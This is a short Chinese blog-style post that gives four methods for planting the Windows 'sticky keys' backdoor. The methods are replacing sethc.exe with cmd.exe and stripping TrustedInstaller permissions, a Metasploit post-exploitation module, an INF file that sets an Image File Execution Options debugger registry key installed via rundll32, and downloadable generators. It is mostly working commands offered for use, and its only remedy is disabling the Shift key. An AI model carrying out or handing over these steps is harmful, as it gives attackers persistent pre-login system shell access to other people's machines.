走过岁月......

后门建立方法一

把 c:\windows\system32\sethc.exe 和 c:\windows\system32\dllcache\sethc.exe 两个文件全部改成 baksethc.exe

move c:\windows\system32\sethc.exe c:\windows\system32\sethc-bak.exe

copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe

另外,如果修改或删除该文件时,默认失败,权限问题,可以属性安全里把其TrustedInstaller用户删除即可

后门建立方法二

使用msf,在meterpreter会话下执行以下命令

meterpreter > run post/windows/manage/sticky_keys

后门建立方法三

将下面的代码保存成inf文件 

[Version] 
Signature="$WINDOWS NT$" 
[DefaultInstall] 
AddReg=My_AddReg_Name
[My_AddReg_Name] 
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe

  

然后上传到一个可以执行目录，然后执行以下命令

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf

  

后门建立方法四

百度搜索下载shift后门生成器，太多了，不赘述

效果演示

以后每次按下5次shift键就会弹出cmd框,即可以做后门又可以做快捷键

成功弹出命令窗口

修复方法

禁用shift键